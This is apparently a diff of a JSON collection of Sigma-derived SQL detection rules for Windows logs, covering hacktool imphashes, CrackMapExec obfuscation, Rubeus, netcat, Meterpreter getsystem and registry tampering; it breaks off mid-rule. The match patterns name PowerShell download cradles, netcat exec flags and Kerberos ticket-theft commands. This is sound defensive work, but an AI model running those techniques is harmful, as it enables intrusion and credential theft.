"Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE 